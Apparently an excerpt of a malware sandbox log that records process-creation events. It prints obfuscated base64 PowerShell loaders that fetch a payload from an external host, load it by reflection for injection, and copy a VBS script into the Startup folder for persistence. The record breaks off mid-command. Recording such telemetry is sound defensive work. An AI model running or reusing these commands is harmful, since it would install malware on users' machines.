[system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnT